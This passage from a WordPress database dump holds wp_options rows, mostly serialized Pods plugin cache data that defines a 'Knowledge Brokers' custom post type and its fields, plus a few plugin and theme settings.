Type\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"comment_count\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"comment_count\";s:5:\"label\";s:13:\"Comment Count\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:8:\"comments\";a:24:{s:2:\"id\";i:0;s:4:\"name\";s:8:\"comments\";s:5:\"label\";s:8:\"Comments\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:7:\"comment\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:19:\"comment_format_type\";s:5:\"multi\";}s:11:\"pick_object\";s:7:\"comment\";s:8:\"pick_val\";s:7:\"comment\";s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}}}','off'),(5625591,'_transient_pods_5bd3cb919ff157e38c95948e13983114','a:0:{}','off'),(5625592,'_transient_timeout_pods_f0dc5ee6e22f5410ed13fb33b34a6877','1782160014','off'),(5625593,'_transient_pods_f0dc5ee6e22f5410ed13fb33b34a6877','a:0:{}','off'),(5625594,'_transient_timeout_pods_52f43e45cf3983a5311f5bb7067de920','1782160015','off'),(5625595,'_transient_pods_52f43e45cf3983a5311f5bb7067de920','a:1:{i:0;i:2393;}','off'),(5625596,'_transient_timeout_pods_b4b9c6e7c925b14f1dcc0062ffcfa069','1782160015','off'),(5625597,'_transient_pods_b4b9c6e7c925b14f1dcc0062ffcfa069','a:28:{s:11:\"object_type\";s:9:\"post_type\";s:4:\"type\";s:9:\"post_type\";s:11:\"object_name\";s:16:\"knowledge_broker\";s:19:\"object_hierarchical\";b:0;s:7:\"storage\";s:4:\"meta\";s:5:\"table\";s:8:\"wp_posts\";s:10:\"meta_table\";s:11:\"wp_postmeta\";s:9:\"pod_table\";s:24:\"wp_pods_knowledge_broker\";s:8:\"field_id\";s:2:\"ID\";s:11:\"field_index\";s:10:\"post_title\";s:10:\"field_slug\";s:9:\"post_name\";s:10:\"field_type\";s:9:\"post_type\";s:12:\"field_parent\";s:11:\"post_parent\";s:19:\"field_parent_select\";s:17:\"`t`.`post_parent`\";s:13:\"meta_field_id\";s:7:\"post_id\";s:16:\"meta_field_index\";s:8:\"meta_key\";s:16:\"meta_field_value\";s:10:\"meta_value\";s:12:\"pod_field_id\";s:2:\"id\";s:15:\"pod_field_index\";s:4:\"name\";s:14:\"pod_field_slug\";N;s:16:\"pod_field_parent\";N;s:4:\"join\";a:0:{}s:5:\"where\";a:1:{s:9:\"post_type\";s:36:\"`t`.`post_type` = \'knowledge_broker\'\";}s:13:\"where_default\";s:34:\"`t`.`post_status` IN ( \'publish\' )\";s:7:\"orderby\";s:51:\"`t`.`menu_order`, `t`.`post_title`, `t`.`post_date`\";s:3:\"pod\";O:16:\"Pods\\Whatsit\\Pod\":1:{s:7:\"\0*\0args\";a:65:{s:11:\"object_type\";s:3:\"pod\";s:19:\"object_storage_type\";s:9:\"post_type\";s:4:\"name\";s:16:\"knowledge_broker\";s:2:\"id\";i:2388;s:6:\"parent\";s:0:\"\";s:5:\"group\";s:0:\"\";s:5:\"label\";s:17:\"Knowledge Brokers\";s:11:\"description\";s:0:\"\";s:6:\"weight\";i:0;s:25:\"_elementor_controls_usage\";a:0:{}s:14:\"label_singular\";s:16:\"Knowledge Broker\";s:6:\"public\";s:1:\"1\";s:7:\"show_ui\";s:1:\"1\";s:14:\"supports_title\";s:1:\"1\";s:15:\"supports_editor\";s:1:\"1\";s:4:\"type\";s:9:\"post_type\";s:7:\"storage\";s:4:\"meta\";s:8:\"old_name\";s:16:\"knowledge_broker\";s:18:\"publicly_queryable\";s:1:\"1\";s:19:\"exclude_from_search\";s:1:\"0\";s:15:\"capability_type\";s:4:\"page\";s:22:\"capability_type_custom\";s:16:\"knowledge_broker\";s:21:\"capability_type_extra\";s:1:\"1\";s:11:\"has_archive\";s:1:\"1\";s:12:\"hierarchical\";s:1:\"0\";s:7:\"rewrite\";s:1:\"1\";s:18:\"rewrite_with_front\";s:1:\"1\";s:13:\"rewrite_feeds\";s:1:\"0\";s:13:\"rewrite_pages\";s:1:\"1\";s:9:\"query_var\";s:1:\"1\";s:10:\"can_export\";s:1:\"1\";s:14:\"default_status\";s:5:\"draft\";s:15:\"supports_author\";s:1:\"0\";s:18:\"supports_thumbnail\";s:1:\"1\";s:16:\"supports_excerpt\";s:1:\"0\";s:19:\"supports_trackbacks\";s:1:\"0\";s:22:\"supports_custom_fields\";s:1:\"0\";s:17:\"supports_comments\";s:1:\"0\";s:18:\"supports_revisions\";s:1:\"0\";s:24:\"supports_page_attributes\";s:1:\"0\";s:21:\"supports_post_formats\";s:1:\"0\";s:28:\"built_in_taxonomies_category\";s:1:\"0\";s:46:\"built_in_taxonomies_elementor_library_category\";s:1:\"0\";s:42:\"built_in_taxonomies_elementor_library_type\";s:1:\"0\";s:33:\"built_in_taxonomies_link_category\";s:1:\"0\";s:28:\"built_in_taxonomies_post_tag\";s:1:\"0\";s:37:\"built_in_taxonomies_resource_category\";s:1:\"0\";s:32:\"built_in_taxonomies_resource_tag\";s:1:\"0\";s:33:\"built_in_taxonomies_resource_type\";s:1:\"0\";s:12:\"show_in_menu\";s:1:\"1\";s:13:\"menu_position\";s:1:\"0\";s:17:\"show_in_nav_menus\";s:1:\"1\";s:17:\"show_in_admin_bar\";s:1:\"1\";s:11:\"pfat_enable\";s:1:\"1\";s:21:\"pfat_run_outside_loop\";s:1:\"1\";s:11:\"pfat_single\";s:26:\"Knowledge Brokers Template\";s:18:\"pfat_append_single\";s:7:\"replace\";s:18:\"pfat_filter_single\";s:11:\"the_content\";s:19:\"pfat_append_archive\";s:7:\"replace\";s:19:\"pfat_filter_archive\";s:11:\"the_content\";s:11:\"rest_enable\";s:1:\"0\";s:8:\"read_all\";s:1:\"0\";s:9:\"write_all\";s:1:\"0\";s:9:\"menu_icon\";s:24:\"dashicons-businessperson\";s:41:\"built_in_taxonomies_institutions_category\";s:1:\"0\";}}s:7:\"recurse\";b:1;s:13:\"object_fields\";a:25:{s:2:\"ID\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:2:\"ID\";s:5:\"label\";s:2:\"ID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:1:{i:0;s:2:\"id\";}s:20:\"hide_in_default_form\";b:1;}s:10:\"post_title\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"post_title\";s:5:\"label\";s:5:\"Title\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:2:{s:14:\"display_filter\";s:9:\"the_title\";s:19:\"display_filter_args\";a:1:{i:0;s:7:\"post_ID\";}}s:5:\"alias\";a:2:{i:0;s:5:\"title\";i:1;s:4:\"name\";}}s:12:\"post_content\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:12:\"post_content\";s:5:\"label\";s:7:\"Content\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:7:\"wysiwyg\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:25:\"wysiwyg_allowed_html_tags\";s:0:\"\";s:21:\"wysiwyg_media_buttons\";i:1;s:14:\"display_filter\";s:11:\"the_content\";s:8:\"pre_save\";i:0;}s:5:\"alias\";a:1:{i:0;s:7:\"content\";}}s:12:\"post_excerpt\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:12:\"post_excerpt\";s:5:\"label\";s:7:\"Excerpt\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:9:\"paragraph\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:20:\"paragraph_allow_html\";i:1;s:27:\"paragraph_allowed_html_tags\";s:0:\"\";s:14:\"display_filter\";s:11:\"the_excerpt\";s:8:\"pre_save\";i:0;}s:5:\"alias\";a:1:{i:0;s:7:\"excerpt\";}}s:11:\"post_author\";a:24:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_author\";s:5:\"label\";s:6:\"Author\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:16:\"pick_format_type\";s:6:\"single\";s:18:\"pick_format_single\";s:12:\"autocomplete\";s:13:\"default_value\";s:10:\"{@user.ID}\";s:21:\"default_evaluate_tags\";i:1;}s:5:\"alias\";a:1:{i:0;s:6:\"author\";}s:11:\"pick_object\";s:4:\"user\";s:8:\"pick_val\";s:4:\"user\";s:17:\"pick_data_storage\";s:6:\"object\";s:11:\"pick_output\";s:3:\"ids\";}s:9:\"post_date\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_date\";s:5:\"label\";s:12:\"Publish Date\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:2:{i:0;s:7:\"created\";i:1;s:4:\"date\";}}s:13:\"post_date_gmt\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_date_gmt\";s:5:\"label\";s:18:\"Publish Date (GMT)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:11:\"post_status\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_status\";s:5:\"label\";s:6:\"Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:5:\"draft\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:11:\"pick_object\";s:11:\"post-status\";s:18:\"pick_format_single\";s:8:\"dropdown\";s:5:\"alias\";a:1:{i:0;s:6:\"status\";}}s:14:\"comment_status\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:14:\"comment_status\";s:5:\"label\";s:14:\"Comment Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:4:\"open\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:4:\"data\";a:2:{s:4:\"open\";s:4:\"Open\";s:6:\"closed\";s:6:\"Closed\";}}s:11:\"ping_status\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"ping_status\";s:5:\"label\";s:11:\"Ping Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:4:\"open\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:4:\"data\";a:2:{s:4:\"open\";s:4:\"Open\";s:6:\"closed\";s:6:\"Closed\";}s:20:\"hide_in_default_form\";b:1;}s:13:\"post_password\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_password\";s:5:\"label\";s:8:\"Password\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"password\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:20:\"hide_in_default_form\";b:1;}s:9:\"post_name\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_name\";s:5:\"label\";s:9:\"Permalink\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"slug\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:2:{i:0;s:4:\"slug\";i:1;s:9:\"permalink\";}}s:7:\"to_ping\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:7:\"to_ping\";s:5:\"label\";s:7:\"To Ping\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:6:\"pinged\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:6:\"pinged\";s:5:\"label\";s:6:\"Pinged\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"post_modified\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_modified\";s:5:\"label\";s:18:\"Last Modified Date\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:8:\"modified\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:17:\"post_modified_gmt\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:17:\"post_modified_gmt\";s:5:\"label\";s:24:\"Last Modified Date (GMT)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:21:\"post_content_filtered\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:21:\"post_content_filtered\";s:5:\"label\";s:18:\"Content (filtered)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:9:\"paragraph\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:7:{s:20:\"paragraph_allow_html\";i:1;s:16:\"paragraph_oembed\";i:1;s:21:\"paragraph_wptexturize\";i:1;s:23:\"paragraph_convert_chars\";i:1;s:17:\"paragraph_wpautop\";i:1;s:25:\"paragraph_allow_shortcode\";i:1;s:27:\"paragraph_allowed_html_tags\";s:0:\"\";}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:11:\"post_parent\";a:26:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_parent\";s:5:\"label\";s:6:\"Parent\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:11:\"pick_object\";s:9:\"post_type\";s:8:\"pick_val\";s:11:\"__current__\";s:17:\"pick_data_storage\";s:6:\"object\";s:11:\"pick_output\";s:3:\"ids\";s:5:\"alias\";a:1:{i:0;s:6:\"parent\";}s:4:\"data\";a:0:{}s:6:\"hidden\";b:1;}s:4:\"guid\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:4:\"guid\";s:5:\"label\";s:4:\"GUID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:10:\"menu_order\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"menu_order\";s:5:\"label\";s:10:\"Menu Order\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:0:{}}s:9:\"post_type\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_type\";s:5:\"label\";s:4:\"Type\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:4:\"type\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:14:\"post_mime_type\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:14:\"post_mime_type\";s:5:\"label\";s:9:\"Mime Type\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"comment_count\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"comment_count\";s:5:\"label\";s:13:\"Comment Count\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:8:\"comments\";a:24:{s:2:\"id\";i:0;s:4:\"name\";s:8:\"comments\";s:5:\"label\";s:8:\"Comments\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:7:\"comment\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:19:\"comment_format_type\";s:5:\"multi\";}s:11:\"pick_object\";s:7:\"comment\";s:8:\"pick_val\";s:7:\"comment\";s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"_thumbnail_id\";a:23:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"_thumbnail_id\";s:5:\"label\";s:14:\"Featured Image\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"file\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:16:\"file_format_type\";s:6:\"single\";s:9:\"file_type\";s:10:\"images-any\";s:15:\"file_edit_title\";i:0;s:5:\"alias\";a:0:{}}}}','off'),(5414560,'bit_social_db_version','1.1.0','on'),(5414561,'bit_social_installed','1774577279','on'),(5414562,'bit_social_version','1.13.3','on'),(5414563,'bit_social_secret_key','bit-social1774577279','off'),(5543971,'iclcat_262','a:0:{}','auto'),(5644555,'_site_transient_timeout_theme_roots','1782105244','off'),(5644556,'_site_transient_theme_roots','a:6:{s:10:\"kava-child\";s:7:\"/themes\";s:4:\"kava\";s:7:\"/themes\";s:16:\"twentytwentyfive\";s:7:\"/themes\";s:16:\"twentytwentyfour\";s:7:\"/themes\";s:17:\"twentytwentythree\";s:7:\"/themes\";s:15:\"twentytwentytwo\";s:7:\"/themes\";}','off'),(5635226,'_transient_timeout_pods_13a4a6cb2f9f457db2a18c5722ffd495','1782398266','off'),(5635227,'_transient_pods_13a4a6cb2f9f457db2a18c5722ffd495','a:0:{}','off'),(5635228,'_transient_timeout_pods_0bce058